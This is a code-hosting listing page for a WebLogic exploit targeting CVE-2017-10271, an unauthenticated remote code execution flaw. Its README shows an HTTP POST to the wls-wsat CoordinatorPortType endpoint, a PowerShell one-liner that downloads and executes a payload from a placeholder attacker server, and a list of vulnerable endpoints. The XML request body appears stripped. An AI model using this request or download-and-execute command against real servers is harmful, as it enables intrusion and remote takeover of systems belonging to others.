Need help with CVE-2017-10271?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

c0mmand3rOpSec
129 Stars 49 Forks 17 Commits 0 Opened issues

Description

WebLogic Exploit

Services available

!
?

Need anything else?

Contributors list

# 378,726
Python
Shell
11 commits
# 490,322
Python
Shell
3 commits
# 595,361
Python
Shell
1 commit

CVE-2017-10271 identification and exploitation. Unauthenticated Weblogic RCE.

https://nvd.nist.gov/vuln/detail/CVE-2017-10271

https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: SOMEHOSTHERE
Content-Length: 1226
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.19.0-25-generic

 
    
cmd /c powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://SOMESERVERHERE/GOTPAYLOAD.ps1')

wls-wsat endpoint list

CoordinatorPortType
RegistrationPortTypeRPC
ParticipantPortType
RegistrationRequesterPortType
CoordinatorPortType11
RegistrationPortTypeRPC11
ParticipantPortType11
RegistrationRequesterPortType11

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.